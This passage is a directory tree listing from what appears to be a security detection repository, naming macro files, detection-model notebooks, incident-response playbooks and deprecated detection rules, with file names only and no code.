process_auditpol.yml ├── process_bitsadmin.yml ├── process_certutil.yml ├── process_cmd.yml ├── process_copy.yml ├── process_csc.yml ├── process_cscript.yml ├── process_curl.yml ├── process_diskshadow.yml ├── process_dllhost.yml ├── process_dsquery.yml ├── process_dxdiag.yml ├── process_esentutl.yml ├── process_fodhelper.yml ├── process_gpupdate.yml ├── process_hh.yml ├── process_installutil.yml ├── process_microsoftworkflowcompiler.yml ├── process_msbuild.yml ├── process_mshta.yml ├── process_msiexec.yml ├── process_net.yml ├── process_netsh.yml ├── process_nltest.yml ├── process_ntdsutil.yml ├── process_office_products.yml ├── process_office_products_parent.yml ├── process_ping.yml ├── process_powershell.yml ├── process_procdump.yml ├── process_psexec.yml ├── process_rclone.yml ├── process_reg.yml ├── process_regasm.yml ├── process_regedit.yml ├── process_regsvcs.yml ├── process_regsvr32.yml ├── process_route.yml ├── process_runas.yml ├── process_rundll32.yml ├── 
process_sc.yml ├── process_schtasks.yml ├── process_sdelete.yml ├── process_setspn.yml ├── process_sqlcmd.yml ├── process_verclsid.yml ├── process_vssadmin.yml ├── process_wbadmin.yml ├── process_wermgr.yml ├── process_wmic.yml ├── process_wscript.yml ├── prohibited_apps_launching_cmd_macro.yml ├── prohibited_softwares.yml ├── ransomware_extensions.yml ├── ransomware_notes.yml ├── remote_access_software_usage_exceptions.yml ├── remoteconnectionmanager.yml ├── remove_valid_domains.yml ├── risk_index.yml ├── s3_accesslogs.yml ├── security_content_ctime.yml ├── security_content_summariesonly.yml ├── security_group_api_calls.yml ├── stream_dns.yml ├── stream_http.yml ├── stream_tcp.yml ├── subjectinterfacepackage.yml ├── summariesonly_config.yml ├── suricata.yml ├── suspicious_email_attachments.yml ├── suspicious_writes.yml ├── sysmon.yml ├── system_network_configuration_discovery_tools.yml ├── uacbypass_process_name.yml ├── uncommon_processes.yml ├── windows_exchange_iis.yml ├── windows_shells.yml ├── wineventlog_application.yml ├── wineventlog_rdp.yml ├── wineventlog_security.yml ├── wineventlog_system.yml ├── wineventlog_task_scheduler.yml ├── wmi.yml ├── zeek_rpc.yml ├── zeek_ssl.yml ├── zeek_x509.yml └── zscaler_proxy.yml ├── notebooks ├── cisa_commonalities_notebook.ipynb ├── cisa_commonalities_notebook.yml ├── detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.ipynb ├── detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.json ├── detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.yml ├── detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.ipynb ├── detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.json ├── detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.yml ├── detect_suspicious_processnames_using_pretrained_model_in_dsdl.ipynb ├── detect_suspicious_processnames_using_pretrained_model_in_dsdl.json ├── detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml ├── 
pretrained_dga_detection.yml ├── pretrained_dga_model_dsdl.ipynb └── pretrained_dga_model_dsdl.json ├── playbooks ├── AD_LDAP_Account_Locking.json ├── AD_LDAP_Account_Locking.png ├── AD_LDAP_Account_Locking.py ├── AD_LDAP_Account_Locking.yml ├── AD_LDAP_Account_Unlocking.json ├── AD_LDAP_Account_Unlocking.png ├── AD_LDAP_Account_Unlocking.py ├── AD_LDAP_Account_Unlocking.yml ├── AD_LDAP_Entity_Attribute_Lookup.json ├── AD_LDAP_Entity_Attribute_Lookup.png ├── AD_LDAP_Entity_Attribute_Lookup.py ├── AD_LDAP_Entity_Attribute_Lookup.yml ├── AWS_IAM_Account_Locking.json ├── AWS_IAM_Account_Locking.png ├── AWS_IAM_Account_Locking.py ├── AWS_IAM_Account_Locking.yml ├── AWS_IAM_Account_Unlocking.json ├── AWS_IAM_Account_Unlocking.png ├── AWS_IAM_Account_Unlocking.py ├── AWS_IAM_Account_Unlocking.yml ├── Active_Directory_Disable_Account_Dispatch.json ├── Active_Directory_Disable_Account_Dispatch.png ├── Active_Directory_Disable_Account_Dispatch.py ├── Active_Directory_Disable_Account_Dispatch.yml ├── Active_Directory_Enable_Account_Dispatch.json ├── Active_Directory_Enable_Account_Dispatch.png ├── Active_Directory_Enable_Account_Dispatch.py ├── Active_Directory_Enable_Account_Dispatch.yml ├── Attribute_Lookup_Dispatch.json ├── Attribute_Lookup_Dispatch.png ├── Attribute_Lookup_Dispatch.py ├── Attribute_Lookup_Dispatch.yml ├── Automated_Enrichment.json ├── Automated_Enrichment.png ├── Automated_Enrichment.py ├── Automated_Enrichment.yml ├── Azure_AD_Account_Locking.json ├── Azure_AD_Account_Locking.png ├── Azure_AD_Account_Locking.py ├── Azure_AD_Account_Locking.yml ├── Azure_AD_Account_Unlocking.json ├── Azure_AD_Account_Unlocking.png ├── Azure_AD_Account_Unlocking.py ├── Azure_AD_Account_Unlocking.yml ├── Azure_AD_Graph_User_Attribute_Lookup.json ├── Azure_AD_Graph_User_Attribute_Lookup.png ├── Azure_AD_Graph_User_Attribute_Lookup.py ├── Azure_AD_Graph_User_Attribute_Lookup.yml ├── CiscoTalosIntelligence_Identifier_Reputation_Analysis.png ├── 
Cisco_Talos_Intelligence_Identifier_Reputation_Analysis.json ├── Cisco_Talos_Intelligence_Identifier_Reputation_Analysis.py ├── Cisco_Talos_Intelligence_Identifier_Reputation_Analysis.yml ├── Cisco_Umbrella_DNS_Denylisting.json ├── Cisco_Umbrella_DNS_Denylisting.png ├── Cisco_Umbrella_DNS_Denylisting.py ├── Cisco_Umbrella_DNS_Denylisting.yml ├── CrowdStrike_OAuth_API_Device_Attribute_Lookup.json ├── CrowdStrike_OAuth_API_Device_Attribute_Lookup.png ├── CrowdStrike_OAuth_API_Device_Attribute_Lookup.py ├── CrowdStrike_OAuth_API_Device_Attribute_Lookup.yml ├── CrowdStrike_OAuth_API_Dynamic_Analysis.json ├── CrowdStrike_OAuth_API_Dynamic_Analysis.png ├── CrowdStrike_OAuth_API_Dynamic_Analysis.py ├── CrowdStrike_OAuth_API_Dynamic_Analysis.yml ├── CrowdStrike_OAuth_API_Identifier_Activity_Analysis.json ├── CrowdStrike_OAuth_API_Identifier_Activity_Analysis.png ├── CrowdStrike_OAuth_API_Identifier_Activity_Analysis.py ├── CrowdStrike_OAuth_API_Identifier_Activity_Analysis.yml ├── DNS_Denylisting_Dispatch.json ├── DNS_Denylisting_Dispatch.png ├── DNS_Denylisting_Dispatch.py ├── DNS_Denylisting_Dispatch.yml ├── Dynamic_Analysis_Dispatch.json ├── Dynamic_Analysis_Dispatch.png ├── Dynamic_Analysis_Dispatch.py ├── Dynamic_Analysis_Dispatch.yml ├── G_Suite_for_GMail_Message_Identifier_Activity_Analysis.json ├── G_Suite_for_GMail_Message_Identifier_Activity_Analysis.png ├── G_Suite_for_GMail_Message_Identifier_Activity_Analysis.py ├── G_Suite_for_GMail_Message_Identifier_Activity_Analysis.yml ├── G_Suite_for_Gmail_Message_Eviction.json ├── G_Suite_for_Gmail_Message_Eviction.png ├── G_Suite_for_Gmail_Message_Eviction.py ├── G_Suite_for_Gmail_Message_Eviction.yml ├── G_Suite_for_Gmail_Search_and_Purge.json ├── G_Suite_for_Gmail_Search_and_Purge.png ├── G_Suite_for_Gmail_Search_and_Purge.py ├── G_Suite_for_Gmail_Search_and_Purge.yml ├── Identifier_Activity_Analysis_Dispatch.json ├── Identifier_Activity_Analysis_Dispatch.png ├── Identifier_Activity_Analysis_Dispatch.py ├── 
Identifier_Activity_Analysis_Dispatch.yml ├── Identifier_Reputation_Analysis_Dispatch.json ├── Identifier_Reputation_Analysis_Dispatch.png ├── Identifier_Reputation_Analysis_Dispatch.py ├── Identifier_Reputation_Analysis_Dispatch.yml ├── Jira_Related_Tickets_Search.json ├── Jira_Related_Tickets_Search.png ├── Jira_Related_Tickets_Search.py ├── Jira_Related_Tickets_Search.yml ├── MS_Graph_for_Office_365_Message_Eviction.json ├── MS_Graph_for_Office_365_Message_Eviction.png ├── MS_Graph_for_Office_365_Message_Eviction.py ├── MS_Graph_for_Office_365_Message_Eviction.yml ├── MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.json ├── MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.png ├── MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.py ├── MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.yml ├── MS_Graph_for_Office_365_Message_Restore.json ├── MS_Graph_for_Office_365_Message_Restore.png ├── MS_Graph_for_Office_365_Message_Restore.py ├── MS_Graph_for_Office_365_Message_Restore.yml ├── MS_Graph_for_Office_365_Search_and_Purge.json ├── MS_Graph_for_Office_365_Search_and_Purge.png ├── MS_Graph_for_Office_365_Search_and_Purge.py ├── MS_Graph_for_Office_365_Search_and_Purge.yml ├── MS_Graph_for_Office_365_Search_and_Restore.json ├── MS_Graph_for_Office_365_Search_and_Restore.png ├── MS_Graph_for_Office_365_Search_and_Restore.py ├── MS_Graph_for_Office_365_Search_and_Restore.yml ├── Panorama_Outbound_Traffic_Filtering.json ├── Panorama_Outbound_Traffic_Filtering.png ├── Panorama_Outbound_Traffic_Filtering.py ├── Panorama_Outbound_Traffic_Filtering.yml ├── PhishTank_URL_Reputation_Analysis.json ├── PhishTank_URL_Reputation_Analysis.png ├── PhishTank_URL_Reputation_Analysis.py ├── PhishTank_URL_Reputation_Analysis.yml ├── Related_Tickets_Search_Dispatch.json ├── Related_Tickets_Search_Dispatch.png ├── Related_Tickets_Search_Dispatch.py ├── Related_Tickets_Search_Dispatch.yml ├── ServiceNow_Related_Tickets_Search.json ├── 
ServiceNow_Related_Tickets_Search.png ├── ServiceNow_Related_Tickets_Search.py ├── ServiceNow_Related_Tickets_Search.yml ├── Splunk_Attack_Analyzer_Dynamic_Analysis.json ├── Splunk_Attack_Analyzer_Dynamic_Analysis.png ├── Splunk_Attack_Analyzer_Dynamic_Analysis.py ├── Splunk_Attack_Analyzer_Dynamic_Analysis.yml ├── Splunk_Automated_Email_Investigation.json ├── Splunk_Automated_Email_Investigation.png ├── Splunk_Automated_Email_Investigation.py ├── Splunk_Automated_Email_Investigation.yml ├── Splunk_Identifier_Activity_Analysis.json ├── Splunk_Identifier_Activity_Analysis.png ├── Splunk_Identifier_Activity_Analysis.py ├── Splunk_Identifier_Activity_Analysis.yml ├── Splunk_Message_Identifier_Activity_Analysis.json ├── Splunk_Message_Identifier_Activity_Analysis.png ├── Splunk_Message_Identifier_Activity_Analysis.py ├── Splunk_Message_Identifier_Activity_Analysis.yml ├── Splunk_Notable_Related_Tickets_Search.json ├── Splunk_Notable_Related_Tickets_Search.png ├── Splunk_Notable_Related_Tickets_Search.py ├── Splunk_Notable_Related_Tickets_Search.yml ├── URL_Outbound_Traffic_Filtering_Dispatch.json ├── URL_Outbound_Traffic_Filtering_Dispatch.png ├── URL_Outbound_Traffic_Filtering_Dispatch.py ├── URL_Outbound_Traffic_Filtering_Dispatch.yml ├── UrlScan_IO_Dynamic_Analysis.json ├── UrlScan_IO_Dynamic_Analysis.png ├── UrlScan_IO_Dynamic_Analysis.py ├── UrlScan_IO_Dynamic_Analysis.yml ├── VirusTotal_v3_Dynamic_Analysis.json ├── VirusTotal_v3_Dynamic_Analysis.png ├── VirusTotal_v3_Dynamic_Analysis.py ├── VirusTotal_v3_Dynamic_Analysis.yml ├── VirusTotal_v3_Identifier_Reputation_Analysis.json ├── VirusTotal_v3_Identifier_Reputation_Analysis.png ├── VirusTotal_v3_Identifier_Reputation_Analysis.py ├── VirusTotal_v3_Identifier_Reputation_Analysis.yml ├── Windows_Defender_ATP_Identifier_Activity_Analysis.json ├── Windows_Defender_ATP_Identifier_Activity_Analysis.png ├── Windows_Defender_ATP_Identifier_Activity_Analysis.py ├── Windows_Defender_ATP_Identifier_Activity_Analysis.yml 
├── Zscaler_Outbound_Traffic_Filtering.json ├── Zscaler_Outbound_Traffic_Filtering.png ├── Zscaler_Outbound_Traffic_Filtering.py ├── Zscaler_Outbound_Traffic_Filtering.yml ├── activedirectory_reset_password.json ├── activedirectory_reset_password.png ├── activedirectory_reset_password.py ├── activedirectory_reset_password.yml ├── aws_disable_user_accounts.json ├── aws_disable_user_accounts.png ├── aws_disable_user_accounts.py ├── aws_disable_user_accounts.yml ├── aws_find_inactive_users.json ├── aws_find_inactive_users.png ├── aws_find_inactive_users.py ├── aws_find_inactive_users.yml ├── block_indicators.json ├── block_indicators.png ├── block_indicators.py ├── block_indicators.yml ├── crowdstrike_malware_triage.json ├── crowdstrike_malware_triage.png ├── crowdstrike_malware_triage.py ├── crowdstrike_malware_triage.yml ├── custom_functions │ ├── artifact_create.json │ ├── artifact_create.py │ ├── artifact_update.json │ ├── artifact_update.py │ ├── asset_get_attributes.json │ ├── asset_get_attributes.py │ ├── base64_decode.json │ ├── base64_decode.py │ ├── collect_by_cef_type.json │ ├── collect_by_cef_type.py │ ├── container_merge.json │ ├── container_merge.py │ ├── container_update.json │ ├── container_update.py │ ├── custom_list_enumerate.json │ ├── custom_list_enumerate.py │ ├── custom_list_value_in_strings.json │ ├── custom_list_value_in_strings.py │ ├── datetime_modify.json │ ├── datetime_modify.py │ ├── debug.json │ ├── debug.py │ ├── find_related_containers.json │ ├── find_related_containers.py │ ├── indicator_collect.json │ ├── indicator_collect.py │ ├── indicator_get_by_tag.json │ ├── indicator_get_by_tag.py │ ├── indicator_tag.json │ ├── indicator_tag.py │ ├── json_safe_format.json │ ├── json_safe_format.py │ ├── list_deduplicate.json │ ├── list_deduplicate.py │ ├── list_drop_none.json │ ├── list_drop_none.py │ ├── list_merge.json │ ├── list_merge.py │ ├── mark_evidence.json │ ├── mark_evidence.py │ ├── noop.json │ ├── noop.py │ ├── passthrough.json │ ├── 
passthrough.py │ ├── playbooks_list.json │ ├── playbooks_list.py │ ├── regex_extract_email.json │ ├── regex_extract_email.py │ ├── regex_extract_ipv4.json │ ├── regex_extract_ipv4.py │ ├── regex_filter_list.json │ ├── regex_filter_list.py │ ├── regex_split.json │ ├── regex_split.py │ ├── string_split.json │ ├── string_split.py │ ├── string_to_lowercase.json │ ├── string_to_lowercase.py │ ├── string_to_uppercase.json │ ├── string_to_uppercase.py │ ├── url_parse.json │ ├── url_parse.py │ ├── workbook_add.json │ ├── workbook_add.py │ ├── workbook_list.json │ ├── workbook_list.py │ ├── workbook_task_update.json │ ├── workbook_task_update.py │ ├── zip_extract.json │ └── zip_extract.py ├── delete_detected_files.json ├── delete_detected_files.png ├── delete_detected_files.py ├── delete_detected_files.yml ├── email_notification_for_malware.json ├── email_notification_for_malware.png ├── email_notification_for_malware.py ├── email_notification_for_malware.yml ├── hunting.json ├── hunting.png ├── hunting.py ├── hunting.yml ├── internal_host_splunk_investigate_log4j.json ├── internal_host_splunk_investigate_log4j.png ├── internal_host_splunk_investigate_log4j.py ├── internal_host_splunk_investigate_log4j.yml ├── internal_host_ssh_investigate.json ├── internal_host_ssh_investigate.png ├── internal_host_ssh_investigate.py ├── internal_host_ssh_investigate.yml ├── internal_host_ssh_log4j_investigate.json ├── internal_host_ssh_log4j_investigate.png ├── internal_host_ssh_log4j_investigate.py ├── internal_host_ssh_log4j_investigate.yml ├── internal_host_ssh_log4j_respond.json ├── internal_host_ssh_log4j_respond.png ├── internal_host_ssh_log4j_respond.py ├── internal_host_ssh_log4j_respond.yml ├── internal_host_winrm_investigate.json ├── internal_host_winrm_investigate.png ├── internal_host_winrm_investigate.py ├── internal_host_winrm_investigate.yml ├── internal_host_winrm_log4j_investigate.json ├── internal_host_winrm_log4j_investigate.png ├── 
internal_host_winrm_log4j_investigate.py ├── internal_host_winrm_log4j_investigate.yml ├── internal_host_winrm_log4j_respond.json ├── internal_host_winrm_log4j_respond.png ├── internal_host_winrm_log4j_respond.py ├── internal_host_winrm_log4j_respond.yml ├── log4j_investigate.json ├── log4j_investigate.png ├── log4j_investigate.py ├── log4j_investigate.yml ├── log4j_respond.json ├── log4j_respond.png ├── log4j_respond.py ├── log4j_respond.yml ├── malware_hunt_and_contain.json ├── malware_hunt_and_contain.png ├── malware_hunt_and_contain.py ├── malware_hunt_and_contain.yml ├── ransomware_investigate_and_contain.json ├── ransomware_investigate_and_contain.png ├── ransomware_investigate_and_contain.py ├── ransomware_investigate_and_contain.yml ├── risk_notable_block_indicators.json ├── risk_notable_block_indicators.png ├── risk_notable_block_indicators.py ├── risk_notable_block_indicators.yml ├── risk_notable_enrich.json ├── risk_notable_enrich.png ├── risk_notable_enrich.py ├── risk_notable_enrich.yml ├── risk_notable_import_data.json ├── risk_notable_import_data.png ├── risk_notable_import_data.py ├── risk_notable_import_data.yml ├── risk_notable_investigate.json ├── risk_notable_investigate.png ├── risk_notable_investigate.py ├── risk_notable_investigate.yml ├── risk_notable_merge_events.json ├── risk_notable_merge_events.png ├── risk_notable_merge_events.py ├── risk_notable_merge_events.yml ├── risk_notable_mitigate.json ├── risk_notable_mitigate.png ├── risk_notable_mitigate.py ├── risk_notable_mitigate.yml ├── risk_notable_preprocess.json ├── risk_notable_preprocess.png ├── risk_notable_preprocess.py ├── risk_notable_preprocess.yml ├── risk_notable_protect_assets_and_users.json ├── risk_notable_protect_assets_and_users.png ├── risk_notable_protect_assets_and_users.py ├── risk_notable_protect_assets_and_users.yml ├── risk_notable_review_indicators.json ├── risk_notable_review_indicators.png ├── risk_notable_review_indicators.py ├── 
risk_notable_review_indicators.yml ├── risk_notable_verdict.json ├── risk_notable_verdict.png ├── risk_notable_verdict.py ├── risk_notable_verdict.yml ├── start_investigation.json ├── start_investigation.png ├── start_investigation.py ├── start_investigation.yml ├── threat_intel_investigate.json ├── threat_intel_investigate.png ├── threat_intel_investigate.py ├── threat_intel_investigate.yml ├── trustar_enrich_indicators.json ├── trustar_enrich_indicators.png ├── trustar_enrich_indicators.py └── trustar_enrich_indicators.yml ├── removed ├── baselines │ ├── add_prohibited_processes_to_enterprise_security.yml │ ├── baseline_of_api_calls_per_user_arn.yml │ ├── baseline_of_excessive_aws_instances_launched_by_user___mltk.yml │ ├── baseline_of_excessive_aws_instances_terminated_by_user___mltk.yml │ ├── monitor_successful_backups.yml │ ├── monitor_unsuccessful_backups.yml │ ├── previously_seen_api_call_per_user_roles_in_cloudtrail.yml │ ├── previously_seen_aws_cross_account_activity.yml │ ├── previously_seen_aws_cross_account_activity___initial.yml │ ├── previously_seen_aws_cross_account_activity___update.yml │ ├── previously_seen_aws_provisioning_activity_sources.yml │ ├── previously_seen_aws_regions.yml │ ├── previously_seen_ec2_amis.yml │ ├── previously_seen_ec2_instance_types.yml │ ├── previously_seen_ec2_launches_by_user.yml │ ├── previously_seen_ec2_modifications_by_user.yml │ ├── previously_seen_users_in_cloudtrail.yml │ ├── systems_ready_for_spectre_meltdown_windows_patch.yml │ └── update_previously_seen_users_in_cloudtrail.yml ├── deprecation_mapping.YML ├── detections │ ├── abnormally_high_aws_instances_launched_by_user.yml │ ├── abnormally_high_aws_instances_launched_by_user___mltk.yml │ ├── abnormally_high_aws_instances_terminated_by_user.yml │ ├── abnormally_high_aws_instances_terminated_by_user___mltk.yml │ ├── account_discovery_with_net_app.yml │ ├── asl_aws_createaccesskey.yml │ ├── asl_aws_excessive_security_scanning.yml │ ├── 
asl_aws_password_policy_changes.yml │ ├── attempt_to_stop_security_service.yml │ ├── attempted_credential_dump_from_registry_via_reg_exe.yml │ ├── aws_cloud_provisioning_from_previously_unseen_city.yml │ ├── aws_cloud_provisioning_from_previously_unseen_country.yml │ ├── aws_cloud_provisioning_from_previously_unseen_ip_address.yml │ ├── aws_cloud_provisioning_from_previously_unseen_region.yml │ ├── aws_cross_account_activity_from_previously_unseen_account.yml │ ├── aws_detect_attach_to_role_policy.yml │ ├── aws_detect_permanent_key_creation.yml │ ├── aws_detect_role_creation.yml │ ├── aws_detect_sts_assume_role_abuse.yml │ ├── aws_detect_sts_get_session_token_abuse.yml │ ├── aws_eks_kubernetes_cluster_sensitive_object_access.yml │ ├── aws_saml_access_by_provider_user_and_principal.yml │ ├── change_default_file_association.yml │ ├── clients_connecting_to_multiple_dns_servers.yml │ ├── cloud_network_access_control_list_deleted.yml │ ├── cmdline_tool_not_executed_in_cmd_shell.yml │ ├── correlation_by_repository_and_risk.yml │ ├── correlation_by_user_and_risk.yml │ ├── create_local_admin_accounts_using_net_exe.yml │ ├── deleting_of_net_users.yml │ ├── detect_activity_related_to_pass_the_hash_attacks.yml │ ├── detect_api_activity_from_users_without_mfa.yml │ ├── detect_aws_api_activities_from_unapproved_accounts.yml │ ├── detect_critical_alerts_from_security_tools.yml │ ├── detect_dns_requests_to_phishing_sites_leveraging_evilginx2.yml │ ├── detect_large_outbound_icmp_packets.yml │ ├── detect_long_dns_txt_record_response.yml │ ├── detect_mimikatz_using_loaded_images.yml │ ├── detect_mimikatz_via_powershell_and_eventcode_4703.yml │ ├── detect_new_api_calls_from_user_roles.yml │ ├── detect_new_user_aws_console_login.yml │ ├── detect_processes_used_for_system_network_configuration_discovery.yml │ ├── detect_spike_in_aws_api_activity.yml │ ├── detect_spike_in_network_acl_activity.yml │ ├── detect_spike_in_security_group_activity.yml │ ├── detect_usb_device_insertion.yml │ 
├── detect_web_traffic_to_dynamic_domain_providers.yml │ ├── detect_webshell_exploit_behavior.yml │ ├── detection_of_dns_tunnels.yml │ ├── disabling_net_user_account.yml │ ├── dns_query_requests_resolved_by_unauthorized_dns_servers.yml │ ├── dns_record_changed.yml │ ├── domain_account_discovery_with_net_app.yml │ ├── domain_group_discovery_with_net.yml │ ├── dump_lsass_via_procdump_rename.yml │ ├── ec2_instance_modified_with_previously_unseen_user.yml │ ├── ec2_instance_started_in_previously_unseen_region.yml │ ├── ec2_instance_started_with_previously_unseen_ami.yml │ ├── ec2_instance_started_with_previously_unseen_instance_type.yml │ ├── ec2_instance_started_with_previously_unseen_user.yml │ ├── elevated_group_discovery_with_net.yml │ ├── excel_spawning_powershell.yml │ ├── excel_spawning_windows_script_host.yml │ ├── excessive_service_stop_attempt.yml │ ├── excessive_usage_of_net_app.yml │ ├── execution_of_file_with_spaces_before_extension.yml │ ├── extended_period_without_successful_netbackup_backups.yml │ ├── extraction_of_registry_hives.yml │ ├── first_time_seen_command_line_argument.yml │ ├── gcp_detect_accounts_with_high_risk_roles_by_project.yml │ ├── gcp_detect_high_risk_permissions_by_resource_and_account.yml │ ├── gcp_detect_oauth_token_abuse.yml │ ├── gcp_kubernetes_cluster_scan_detection.yml │ ├── github_actions_disable_security_workflow.yml │ ├── github_commit_changes_in_master.yml │ ├── github_commit_in_develop.yml │ ├── github_dependabot_alert.yml │ ├── github_pull_request_from_unknown_user.yml │ ├── identify_new_user_accounts.yml │ ├── known_services_killed_by_ransomware.yml │ ├── kubernetes_aws_detect_most_active_service_accounts_by_pod.yml │ ├── kubernetes_aws_detect_rbac_authorization_by_account.yml │ ├── kubernetes_aws_detect_sensitive_role_access.yml │ ├── kubernetes_aws_detect_service_accounts_forbidden_failure_access.yml │ ├── kubernetes_azure_active_service_accounts_by_pod_namespace.yml │ ├── 
kubernetes_azure_detect_rbac_authorization_by_account.yml │ ├── kubernetes_azure_detect_sensitive_object_access.yml │ ├── kubernetes_azure_detect_sensitive_role_access.yml │ ├── kubernetes_azure_detect_service_accounts_forbidden_failure_access.yml │ ├── kubernetes_azure_detect_suspicious_kubectl_calls.yml │ ├── kubernetes_azure_pod_scan_fingerprint.yml │ ├── kubernetes_azure_scan_fingerprint.yml │ ├── kubernetes_gcp_detect_most_active_service_accounts_by_pod.yml │ ├── kubernetes_gcp_detect_rbac_authorizations_by_account.yml │ ├── kubernetes_gcp_detect_sensitive_object_access.yml │ ├── kubernetes_gcp_detect_sensitive_role_access.yml │ ├── kubernetes_gcp_detect_service_accounts_forbidden_failure_access.yml │ ├── kubernetes_gcp_detect_suspicious_kubectl_calls.yml │ ├── linux_auditd_find_private_keys.yml │ ├── local_account_discovery_with_net.yml │ ├── monitor_dns_for_brand_abuse.yml │ ├── mshtml_module_load_in_office_product.yml │ ├── multiple_okta_users_with_invalid_credentials_from_the_same_ip.yml │ ├── net_localgroup_discovery.yml │ ├── network_connection_discovery_with_net.yml │ ├── o365_suspicious_admin_email_forwarding.yml │ ├── o365_suspicious_rights_delegation.yml │ ├── o365_suspicious_user_email_forwarding.yml │ ├── office_application_drop_executable.yml │ ├── office_application_spawn_regsvr32_process.yml │ ├── office_application_spawn_rundll32_process.yml │ ├── office_document_creating_schedule_task.yml │ ├── office_document_executing_macro_code.yml │ ├── office_document_spawned_child_process_to_download.yml │ ├── office_product_spawn_cmd_process.yml │ ├── office_product_spawning_bitsadmin.yml │ ├── office_product_spawning_certutil.yml │ ├── office_product_spawning_mshta.yml │ ├── office_product_spawning_rundll32_with_no_dll.yml │ ├── office_product_spawning_windows_script_host.yml │ ├── office_product_spawning_wmic.yml │ ├── office_product_writing_cab_or_inf.yml │ ├── office_spawning_control.yml │ ├── okta_account_locked_out.yml │ ├── 
okta_account_lockout_events.yml │ ├── okta_failed_sso_attempts.yml │ ├── okta_threatinsight_login_failure_with_high_unknown_users.yml │ ├── okta_threatinsight_suspected_passwordspray_attack.yml │ ├── okta_two_or_more_rejected_okta_pushes.yml │ ├── osquery_pack___coldroot_detection.yml │ ├── password_policy_discovery_with_net.yml │ ├── processes_created_by_netsh.yml │ ├── prohibited_software_on_endpoint.yml │ ├── reg_exe_used_to_hide_files_directories_via_registry_keys.yml │ ├── remote_desktop_network_bruteforce.yml │ ├── remote_registry_key_modifications.yml │ ├── remote_system_discovery_with_net.yml │ ├── scheduled_tasks_used_in_badrabbit_ransomware.yml │ ├── spectre_and_meltdown_vulnerable_systems.yml │ ├── suspicious_changes_to_file_associations.yml │ ├── suspicious_driver_loaded_path.yml │ ├── suspicious_email___uba_anomaly.yml │ ├── suspicious_event_log_service_behavior.yml │ ├── suspicious_file_write.yml │ ├── suspicious_powershell_command_line_arguments.yml │ ├── suspicious_process_file_path.yml │ ├── suspicious_rundll32_rename.yml │ ├── suspicious_writes_to_system_volume_information.yml │ ├── uncommon_processes_on_endpoint.yml │ ├── unsigned_image_loaded_by_lsass.yml │ ├── unsuccessful_netbackup_backups.yml │ ├── web_fraud___account_harvesting.yml │ ├── web_fraud___anomalous_user_clickspeed.yml │ ├── web_fraud___password_sharing_across_accounts.yml │ ├── windows_command_shell_fetch_env_variables.yml │ ├── windows_connhost_exe_started_forcefully.yml │ ├── windows_dll_search_order_hijacking_hunt.yml │ ├── windows_hosts_file_modification.yml │ ├── windows_lateral_tool_transfer_remcom.yml │ ├── windows_modify_registry_reg_restore.yml │ ├── windows_msiexec_with_network_connections.yml │ ├── windows_network_share_interaction_with_net.yml │ ├── windows_office_product_spawning_msdt.yml │ ├── windows_query_registry_reg_save.yml │ ├── windows_service_created_within_public_path.yml │ ├── windows_service_stop_via_net__and_sc_application.yml │ ├── 
windows_valid_account_with_never_expires_password.yml │ ├── winword_spawning_cmd.yml │ ├── winword_spawning_powershell.yml │ └── winword_spawning_windows_script_host.yml ├── investigations │ ├── all_backup_logs_for_host.yml │ ├── amazon_eks_kubernetes_activity_by_src_ip.yml │ ├── aws_investigate_security_hub_alerts_by_dest.yml │ ├── aws_investigate_user_activities_by_accesskeyid.yml │ ├── aws_investigate_user_activities_by_arn.yml │ ├── aws_network_acl_details_from_id.yml │ ├── aws_network_interface_details_via_resourceid.yml │ ├── aws_s3_bucket_details_via_bucketname.yml │ ├── gcp_kubernetes_activity_by_src_ip.yml │ ├── get_all_aws_activity_from_city.yml │ ├── get_all_aws_activity_from_country.yml │ ├── get_all_aws_activity_from_ip_address.yml │ ├── get_all_aws_activity_from_region.yml │ ├── get_backup_logs_for_endpoint.yml │ ├── get_certificate_logs_for_a_domain.yml │ ├── get_dns_server_history_for_a_host.yml │ ├── get_dns_traffic_ratio.yml │ ├── get_ec2_instance_details_by_instanceid.yml │ ├── get_ec2_launch_details.yml │ ├── get_email_info.yml │ ├── get_emails_from_specific_sender.yml │ ├── get_first_occurrence_and_last_occurrence_of_a_mac_address.yml │ ├── get_history_of_email_sources.yml │ ├── get_logon_rights_modifications_for_endpoint.yml │ ├── get_logon_rights_modifications_for_user.yml │ ├── get_notable_history.yml │ ├── get_outbound_emails_to_hidden_cobra_threat_actors.yml │ ├── get_parent_process_info.yml │ ├── get_process_file_activity.yml │ ├── get_process_info.yml │ ├── get_process_information_for_port_activity.yml │ ├── get_process_responsible_for_the_dns_traffic.yml │ ├── get_sysmon_wmi_activity_for_host.yml │ ├── get_web_session_information_via_session_id.yml │ ├── investigate_aws_activities_via_region_name.yml │ ├── investigate_aws_user_activities_by_user_field.yml │ ├── investigate_failed_logins_for_multiple_destinations.yml │ ├── investigate_network_traffic_from_src_ip.yml │ ├── investigate_okta_activity_by_app.yml │ ├── 
investigate_okta_activity_by_ip_address.yml │ ├── investigate_pass_the_hash_attempts.yml │ ├── investigate_pass_the_ticket_attempts.yml │ ├── investigate_previous_unseen_user.yml │ ├── investigate_successful_remote_desktop_authentications.yml │ ├── investigate_suspicious_strings_in_http_header.yml │ ├── investigate_user_activities_in_okta.yml │ └── investigate_web_posts_from_src.yml └── stories │ ├── aws_cross_account_activity.yml │ ├── aws_cryptomining.yml │ ├── aws_suspicious_provisioning_activities.yml │ ├── common_phishing_frameworks.yml │ ├── container_implantation_monitoring_and_investigation.yml │ ├── earth_estries.yml │ ├── host_redirection.yml │ ├── kubernetes_sensitive_role_activity.yml │ ├── lateral_movement.yml │ ├── monitor_backup_solution.yml │ ├── monitor_for_unauthorized_software.yml │ ├── nexus_apt_threat_activity.yml │ ├── office_365_detections.yml │ ├── spectre_and_meltdown_vulnerabilities.yml │ ├── suspicious_aws_ec2_activities.yml │ ├── unusual_aws_ec2_modifications.yml │ └── web_fraud_detection.yml ├── requirements.txt ├── stories ├── 